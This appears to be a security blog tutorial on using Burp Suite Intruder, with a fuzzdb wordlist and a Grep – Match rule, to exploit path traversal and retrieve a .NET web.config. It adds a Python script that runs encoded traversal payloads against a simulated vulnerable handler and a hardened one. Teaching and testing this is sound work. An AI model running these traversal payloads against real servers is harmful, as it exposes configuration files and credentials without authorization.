Exploiting a Path Traversal vulnerability with Burp Suite Community Edition and the Grep – Match feature of Intruder

Tram Ho

INTRODUCTION

Path Traversal is a well-known, never outdated and impactful vulnerability. Also called a dot-dot-slash (../) attack or directory traversal, it exploits the application's failure to sanitize user input that is used to build a path name for reading files or directories from the file system, where access is supposed to be confined to a restricted parent directory. By manipulating that value with special characters such as "../", an attacker can make the path name resolve to a location outside the restricted directory.

In OWASP's terminology a path traversal attack belongs to category A5 of the Top 10 (2017): Broken Access Control, so as one of the top 10 issues of 2017 it deserves special attention.

In this blog post we walk through an example of using path traversal to extract web.config with the Burp Suite Intruder tool.

Previous posts on path traversal attacks:

  • How to prevent Path Traversal in .NET
  • From Path Traversal to Source Code in Asp.NET MVC Applications

TESTING STEP-BY-STEP

First, download Burp Suite Community Edition, a useful testing tool that offers a variety of automated and semi-automated features to improve the efficiency of security testing. In particular, the Burp Intruder feature is very useful for exploiting traversal vulnerabilities. Suppose there is a .NET web application that is vulnerable to path traversal. To exploit the issue, an attacker could try to download the full source code of the application by following this guide.

When an attacker finds an endpoint that could be vulnerable to Path Traversal, the request can be sent to Burp Intruder as shown in the following screenshot.

On the Intruder tab, the target is already set from the request that will be used to retrieve the web.config file. Make sure the payload position marker is placed on the correct parameter; if it is not, click "Clear §", select the parameter value to fuzz and click the "Add §" button.

To set the payloads that Burp Intruder will use when sending requests, download the file traversals-8-deep-exotic-encoding.txt from the fuzzdb project and load it into Burp Intruder as follows:

  • go to the "Payloads" sub-tab;
  • in the "Payload type" dropdown list choose "Simple list";
  • in the "Payload Options" panel click the "Load ..." button and choose the downloaded traversals-8-deep-exotic-encoding.txt (as shown in the screenshot below).

The next step is to add a Payload Processing rule that matches the placeholder "{FILE}" used in the wordlist and replaces it with the name of the file we want to extract (in our example "web.config"), so click the "Add" button.

In the payload processing rule, set "Match" to the string "{FILE}" and "Replace" to the string "web.config", as shown in the following screenshot:

To make a successful request easy to spot, a Grep – Match expression can be added (when part of the expected file content is known), so that Burp flags positive responses for you. First delete all the existing rules:

Then add a new Grep – Match rule for the string "configuration" (the root element of every web.config is <configuration>), whose presence in a response indicates that the web.config file has been retrieved.

Finally, adjust the Request Engine options (number of threads, retries, pause before retry, throttling) according to the limits of the web server and any firewall or anti-throttling protection in front of it, to avoid false results caused by dropped or blocked requests.
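The Intruder workflow described above (payload list with a {FILE} placeholder, a Match/Replace processing rule, one request per candidate, and a Grep – Match on the response) can be reproduced in a script. The example below is added to this post and is not part of the original article or of Burp Suite; it uses a small constructed subset of fuzzdb-style payloads (not the real traversals-8-deep-exotic-encoding.txt) and a constructed in-memory target handler, so it runs offline. The handler names, the virtual file tree and the "/app/Content/images" web root are assumptions for illustration; a vulnerable handler is shown beside a hardened one so you can see which payloads tick the "configuration" column and why the containment check stops them.

```python
"""Script equivalent of the Burp Intruder + Grep-Match workflow (added example)."""
import posixpath
import urllib.parse

# Constructed sample payloads in the style of fuzzdb's
# traversals-8-deep-exotic-encoding.txt (a small subset, NOT the real file).
SAMPLE_PAYLOADS = [
    "../{FILE}",
    "../../{FILE}",
    "../../../{FILE}",
    "..%2f..%2f{FILE}",          # URL-encoded slashes
    "..%252f..%252f{FILE}",      # double URL-encoded slashes
    "..\\..\\{FILE}",            # Windows separators
    "....//....//{FILE}",        # defeats naive "../" stripping
    "%2e%2e/%2e%2e/{FILE}",      # URL-encoded dots
]

TARGET_FILE = "web.config"
GREP_MATCH = "configuration"    # root element <configuration> of web.config

# Constructed virtual file system (assumption): the app lives under /app and
# the endpoint is only meant to serve files from /app/Content/images.
WEB_ROOT = "/app/Content/images"
VIRTUAL_FS = {
    "/app/web.config": (
        '<?xml version="1.0"?><configuration><connectionStrings>'
        "...</connectionStrings></configuration>"
    ),
    "/app/Content/images/logo.png": "PNG...",
}


def build_payloads(template_lines, filename):
    """Payload Processing rule: Match "{FILE}" / Replace with the target file."""
    return [line.strip().replace("{FILE}", filename)
            for line in template_lines if line.strip()]


def _resolve(user_path):
    # One URL decode (as a typical web framework does) and Windows-style
    # backslashes treated as separators, then join and normalise.
    decoded = urllib.parse.unquote(user_path).replace("\\", "/")
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded))


def vulnerable_handler(user_path):
    """Joins user input to the web root with no containment check."""
    return VIRTUAL_FS.get(_resolve(user_path), "404 Not Found")


def hardened_handler(user_path):
    """Same resolution, but refuses any path that escapes the web root."""
    full = _resolve(user_path)
    if not full.startswith(WEB_ROOT + "/"):
        return "403 Forbidden"
    return VIRTUAL_FS.get(full, "404 Not Found")


def run_intruder(handler, payloads, grep):
    """Returns the payloads whose response contains the grep string,
    i.e. the rows that would have the "configuration" column ticked."""
    return [p for p in payloads if grep in handler(p)]


def main():
    payloads = build_payloads(SAMPLE_PAYLOADS, TARGET_FILE)
    for name, handler in (("vulnerable", vulnerable_handler),
                          ("hardened", hardened_handler)):
        hits = run_intruder(handler, payloads, GREP_MATCH)
        print(f"{name}: {len(hits)} of {len(payloads)} payloads matched")
        for p in hits:
            print("  ", p)


if __name__ == "__main__":
    main()
```

Note that against this single-decoding handler the double-encoded payload ("..%252f") and the "....//" variant do not match; they are in the fuzzdb list because other decoding or filtering behaviour on the server side can make them work, which is exactly why the full list is sent rather than a single hand-picked "../" sequence.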

RESULT

If the endpoint is vulnerable to path traversal, the "configuration" column will be checked for every payload whose response contained the web.config file.



Source : Viblo